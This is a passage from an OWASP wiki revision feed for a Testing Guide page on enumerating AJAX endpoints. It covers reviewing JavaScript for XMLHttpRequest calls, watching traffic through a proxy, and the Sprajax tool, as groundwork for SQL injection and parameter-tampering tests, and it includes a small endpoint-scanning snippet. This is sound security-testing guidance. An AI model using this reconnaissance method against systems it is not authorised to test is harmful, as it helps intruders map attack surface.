The tester should look through HTML and JavaScript files to find URLs of additional application surface exposure.  Searching for use of the XMLHttpRequest object in JavaScript code can help to focus these reviewing efforts.  Also, by knowing the names of included JavaScript files, the tester can determine which AJAX frameworks appear to be in use.  Once AJAX endpoints have been identified, the tester should further inspect the code to determine the format required of requests.&lt;br /&gt;
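One way to sketch this search, assuming the endpoints appear as string literals in calls to open(); the sample source line below is a hypothetical snippet, not real application code:

```javascript
// Scan JavaScript source text for candidate AJAX endpoints by matching
// string literals passed to .open('GET'/'POST', url, ...) calls.
function findOpenUrls(jsSource) {
  const re = /\.open\(\s*['"](?:GET|POST)['"]\s*,\s*['"]([^'"]+)['"]/g;
  const urls = [];
  let m;
  while ((m = re.exec(jsSource)) !== null) {
    urls.push(m[1]); // capture group 1 holds the endpoint URL
  }
  return urls;
}

// Hypothetical line a tester might find in a downloaded script file.
const sample = "xhr.open('POST', '/app/SearchService.asmx/Search', true);";
const endpoints = findOpenUrls(sample);
```

The same pattern can be run across every script file the application serves, giving a quick first inventory of endpoints to probe with a proxy.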
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasPage.PNG]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The advantage of using a proxy to observe traffic is that the actual requests demonstrate conclusively where the application is sending requests and what format those requests are in.  The disadvantage is that only the endpoints that the application actually makes calls to will be revealed.  The tester must fully exercise the remote application, and even then there could be additional call endpoints that are available but not actively in use.  In exercising the application, the proxy should observe traffic to both the user-viewable pages and the background asynchronous traffic to the AJAX endpoints.  Capturing this session traffic data allows the tester to determine all of the HTTP requests that are being made during the session as opposed to only looking at the user-viewable pages in the application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasRequest.jpg]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
By enumerating the AJAX endpoints available in an application and determining the required request format, the tester can set the stage for further analysis of the application.  Once endpoints and proper request formats have been determined, the tester can use a web proxy and standard web application parameter manipulation techniques to look for SQL injection and parameter tampering attacks.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for AJAX Endpoints:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Access to additional information about the application source code can greatly speed efforts to enumerate AJAX endpoints, and the knowledge of what frameworks are in use will help the tester to understand the required format for AJAX requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Knowledge of the frameworks being used and the AJAX endpoints that are available helps the tester to focus their efforts and reduces the time required for discovery and application footprinting.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* ...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* The OWASP Sprajax tool [[Category:OWASP_Sprajax_Project]] can be used to spider web applications, identify AJAX frameworks in use, enumerate AJAX call endpoints, and fuzz those endpoints with framework-appropriate traffic.  At the current time, there is only support for the Microsoft Atlas framework (and detection for the Google Web Toolkit), but ongoing development should increase the utility of the tool.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=13708</id>
		<title>AJAX How to test AoC</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=13708"/>
				<updated>2006-11-27T02:01:43Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: /* Description of the Issue */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Because most attacks against AJAX applications are analogs of attacks against traditional web applications, testers should refer to other sections of the testing guide to look for specific parameter manipulations to use in order to discover vulnerabilities.  The challenge with AJAX-enabled applications is often finding the endpoints that are the targets for the asynchronous calls and then determining the proper format for requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Traditional web applications are fairly easy to discover in an automated fashion.  An application typically has one or more pages that are connected by HREFs or other links.  Interesting pages will have one or more HTML FORMs.  These forms will have one or more parameters.  By using simple spidering techniques such as looking for anchor (A) tags and HTML FORMs it should be possible to discover all pages, forms, and parameters in a traditional web application.  Requests made to this application follow a well-known and consistent format laid out in the HTTP specification.  GET requests have the format:&lt;br /&gt;
&lt;br /&gt;
http://server.com/directory/resource.cgi?param1=value1&amp;amp;key=value&lt;br /&gt;
&lt;br /&gt;
POST requests are sent to URLs in a similar fashion:&lt;br /&gt;
&lt;br /&gt;
http://server.com/directory/resource.cgi&lt;br /&gt;
&lt;br /&gt;
Data sent to POST requests is encoded in a similar format and included in the request after the headers:&lt;br /&gt;
&lt;br /&gt;
param1=value1&amp;amp;key=value&lt;br /&gt;
&lt;br /&gt;
Unfortunately, server-side AJAX endpoints are not as easy or consistent to discover, and the format of actual valid requests is left to the AJAX framework in use or the discretion of the developer.  Therefore to fully test AJAX-enabled applications, testers need to be aware of the frameworks in use, the AJAX endpoints that are available, and the required format for requests to be considered valid.  Once this understanding has been developed, standard parameter manipulation techniques using a proxy can be used to test for SQL injection and other flaws.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for AJAX Endpoints:''' &amp;lt;br&amp;gt;&lt;br /&gt;
Before an AJAX-enabled web application can be tested, the call endpoints for the asynchronous calls must be enumerated.  See [[Application_Discovery_AoC]] for more information about how traditional web applications are discovered.  For AJAX applications, there are two main approaches to determining call endpoints: parsing the HTML and JavaScript files and using a proxy to observe traffic.&lt;br /&gt;
&lt;br /&gt;
The advantage of parsing the HTML and JavaScript files in a web application is that it can provide a more comprehensive view of the server-side capabilities that can be accessed from the client side.  The drawback is that manually reviewing HTML and JavaScript content is tedious and, more importantly, the location and format of server-side URLs available to be accessed by AJAX calls are framework dependent.&lt;br /&gt;
&lt;br /&gt;
The tester should look through HTML and JavaScript files to find URLs of additional application surface exposure.  Searching for use of the XMLHttpRequest object in JavaScript code can help to focus these reviewing efforts.  Also, by knowing the names of included JavaScript files the tester can determine what AJAX frameworks appear to be in use.  Once AJAX endpoints have been identified, the tester should further inspect the code to determine the format required of requests.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasPage.PNG]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The advantage of using a proxy to observe traffic is that the actual requests demonstrate conclusively where the application is sending requests and what format those requests are in.  The disadvantage is that only the endpoints that the application actually makes calls to will be revealed.  The tester must fully exercise the remote application and even then there could be additional call endpoints that are available but not actively in use.  In exercising the application, the proxy should observe traffic to both the user-viewable pages as well as the background asynchronous traffic to the AJAX endpoints.  Capturing this session traffic data allows the tester to determine all of the HTTP requests that are being made during the session as opposed to only looking at the user-viewable pages in the application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasRequest.jpg]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
By enumerating the AJAX endpoints available in an application and determining the required request format the tester can set the stage for further analysis of the application.  Once endpoints and proper request formats have been determined, the tester can use a web proxy and standard web application parameter manipulation techniques to look for SQL injection and parameter tampering attacks.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for AJAX Endpoints:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Access to additional information about the application source code can greatly speed efforts to enumerate AJAX endpoints and the knowledge of what frameworks are in use will help the tester to understand the required format for AJAX requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Knowledge of the frameworks being used and AJAX endpoints that are available helps the tester to focus their efforts and reduce the time required for discovery and application footprinting.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* ...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* The OWASP Sprajax tool [[Category:OWASP_Sprajax_Project]] can be used to spider web applications, identify AJAX frameworks in use, enumerate AJAX call endpoints and fuzz those endpoints with framework-appropriate traffic.  At the current time there is only support for the Microsoft Atlas framework (and detection for the Google Web Toolkit) but ongoing development should increase the utility of the tool.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	</feed>